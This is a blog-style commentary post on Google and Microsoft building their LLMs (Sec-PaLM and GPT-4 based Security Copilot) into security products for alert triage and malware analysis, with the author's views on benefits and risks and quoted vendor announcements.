Microsoft and Google using LLMs for Cybersecurity

Google and Microsoft are integrating their LLMs, PaLM and GPT-4 respectively, into their cybersecurity services.

They basically have two uses cases:

1. Better User Interfaces + Analysis Help for Security Analysts

Using the LLM to explain incidents (cyberattacks or things that might be attacks) in natural language, and answer questions from analysts in natural language, very similar to how one might use a LLM chatbot as a research assistant, except for these systems are given access to all the data within your organization + other Google or Microsoft tools.

Security analysts are constantly beset by “alert fatigue”—they receive so many alerts for things that might be a cyberattack, that they can’t handle it all. These LLMs help address that by summarizing and contextualizing the alerts. They can also be used to automatically write queries (formal requests for information) to the network, which are more like code generation

Both companies also hope that explaining incidents in natural language will help address the talent shortage of cybersecurity professionals, by helping security analysts with less experience do better analysis.

This is a parallel to how much of the military is going to make use of LLMs—by saving time for human intelligence analysts (CSIS estimates 45 days a year per analyst!).

2. Reverse Engineering to Identify Malware

That is, you can feed it the machine code for a piece of software you think might be malware, and it will tell you what the machine code does, and provide summaries in natural language. This seems like one of the biggest use cases for defenders, since “you can do in minutes what used to take a whole day” (Microsoft tutorial).

Google’s version of this tool is called VirusTota Code Insightl, more documentation here. On a broader level, you don’t just have to upload a piece of suspected malware to these tools to get a result—these tools can always be scanning your network looking for code that could be malware. In this way, they’re not just a user interface improvement or a gimmick, they’re the latest improvement in a long line of malware detection tools that are pretty central to how enterprises defend themselves.

What does this mean?

Context

Microsoft and Google, among other things, are huge cybersecurity players. So, this is a fairly big deal for the world of cyber.

  • Gmail and Outlook combined make up 68% of the email market. They’re handling security for all that.

  • Google and Microsoft also make up 10% and 23% of the cloud computing market respectively. That’s a hefty chunk of the digital world that must be secured, and customers like to buy their security from the same company that handles their cloud, because it simplifies managing their tech.

  • In 2022 Microsoft made $20 billion in revenue from cybersecurity services (about 10% of its total earnings). It’s hard to know how much Google makes, since security services are bundled with their cloud offerings.

The Good

For those of us that worry about AI powered hackers, it’s pretty good that the companies developing powerful AI are also the companies managing a lot of the world’s cybersecurity. They’re incentivized to use advances in AI to make their systems more secure, and importantly, they’re incentivized not to release a LLM to the public that could hack their own systems.

I’m also hoping that a lot of the security talent at Google and Microsoft gain experience using advanced AI to improve security. When AI gets more powerful, my hope is that 1) AI companies can use their AI to improve their own security, thereby reducing the chance of model weights being stolen and the number of AGI labs increasing which effects racing dynamics etc etc and 2) we gain some time before doom because people + smaller AI systems improved the world’s security enough that the most advanced AI systems couldn’t take over at least for a little bit. Having more people with experience using AI to improve security is good for both of these.

The Bad

Maybe this accelerates investment in AI just a bit, because cyber is a huge application, but this basically matches my previous feelings around cyberAI and I’m not personally taking any updates on this.

Maybe AI in cyber still mainly helps attackers more than defenders. Better phishing attacks, and especially real time audio deep fakes, are just pretty bad considering how many attacks start with social engineering to manipulate humans like that—and we’re not updating the humans.

Maybe this is less than I expected these companies to be using their AI for. Like, I’d be excited for Google + Microsoft to use AI to stress test their own security more—what happens if you make a deep fake of the CEO and call a bunch of Microsoft employees? Can you adapt your security to combat that? As far as I know they’re not doing that, but it’s hard to tell what’s going on inside such a big company.

Other Info

Both companies fine tuned their LLMs on the massive troves of cyber data they possess.

Both Google and Microsoft’s offerings are in preview, as of this article. They’re being rolled out to a select number of beta-testers, before being fully released to all their customers in perhaps 3-4 months.

Microsoft announced their system March 28, Google announced their system April 24.

Both companies claim that customer data will not be used to train foundation models.

As far as I can tell, both companies are offering essentially the same services with their LLMs for security, just marketed slightly differently.

Appendix: Quotes from Google + Microsoft

Google

Google is launching a new service called “Google Cloud Security AI Workbench” built on top of a fine tuned version of PaLM.

“[Sec-PaLM] is fine-tuned for security use cases, incorporating our unsurpassed security intelligence such as Google’s visibility into the threat landscape and Mandiant’s frontline intelligence on vulnerabilities, malware, threat indicators, and behavioral threat actor profiles.”

Preventing Threats from Spreading beyond first infection

“We already provide best-in-class capabilities to help organizations immediately respond to threats. But what if we could not just identify and contain initial infections, but also help prevent them from happening anywhere else? With our AI advances, we can now combine world class threat intelligence with point-in-time incident analysis and novel AI-based detections and analytics to help prevent new infections. These advances are critical to help counter a potential surge in adversarial attacks that use machine learning and generative AI systems.

  • VirusTotal Code Insight uses Sec-PaLM to help analyze and explain the behavior of potentially malicious scripts, and will be able to better detect which scripts are actually threats.

  • Mandiant Breach Analytics for Chronicle leverages Google Cloud and Mandiant Threat Intelligence to automatically alert you to active breaches in your environment. It will use Sec-PaLM to help contextualize and respond instantly to these critical findings.”

Reducing toil

“Advances in generative AI can help reduce the number of tools organizations need to secure their vast attack surface areas and ultimately, empower systems to secure themselves. This will minimize the toil it takes to manage multiple environments, to generate security design and capabilities, and to generate security controls. Today, we’re announcing:

  • Assured OSS will use LLMs to help us add even more open-source software (OSS) packages to our OSS vulnerability management solution, which offers the same curated and vulnerability-tested packages that we use at Google.

  • Mandiant Threat Intelligence AI, built on top of Mandiant’s massive threat graph, will leverage Sec-PaLM to quickly find, summarize, and act on threats relevant to your organization.”

Evolving how practitioners do security to close the talent gap

“To help power this evolution, we’re embedding Sec-PaLM-based features that can make security more understandable while helping to improve effectiveness with exciting new capabilities in two of our solutions:

  • Chronicle AI: Chronicle customers will be able to search billions of security events and interact conversationally with the results, ask follow-up questions, and quickly generate detections, all without learning a new syntax or schema.

  • Security Command Center AI: Security Command Center will translate complex attack graphs to human-readable explanations of attack exposure, including impacted assets and recommended mitigations. It will also provide AI-powered risk summaries for security, compliance, and privacy findings for Google Cloud.”

Microsoft

“Security Copilot delivers critical step-by-step guidance and context through a natural language-based investigation experience that accelerates incident investigation and response.”

This basically means that:

“Attackers hide behind noise and weak signals. Defenders can now discover malicious behavior and threat signals that could otherwise go undetected. Security Copilot surfaces prioritized threats in real time and anticipates a threat actor’s next move with continuous reasoning based on Microsoft’s global threat intelligence.”

Final Note:

Any feedback you have on my writing is deeply appreciated. If you think I’m wrong, please let me know! I’m excited for more data.

No comments.